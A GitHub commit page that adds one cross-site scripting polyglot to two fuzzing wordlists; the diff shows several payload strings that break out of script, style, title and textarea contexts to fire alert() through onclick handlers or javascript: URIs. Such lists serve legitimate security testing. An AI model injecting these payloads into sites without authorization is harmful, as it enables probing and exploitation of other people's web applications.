Skip to content

Commit

Permalink
Added addition XSS polyglot.
Browse files Browse the repository at this point in the history
  • Loading branch information
danielmiessler committed Aug 18, 2015
1 parent 44d69f4 commit cafd775
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 0 deletions.
1 change: 1 addition & 0 deletions Fuzzing/Polyglots/DMIESSLER_XSS_Polyglots.txt
Original file line number Diff line number Diff line change
Expand Up @@ -8,3 +8,4 @@ javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert(
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
1 change: 1 addition & 0 deletions Fuzzing/Polyglots/XSS_Polyglots.txt
Original file line number Diff line number Diff line change
Expand Up @@ -11,3 +11,4 @@ javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert(
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

0 comments on commit cafd775

Please sign in to comment.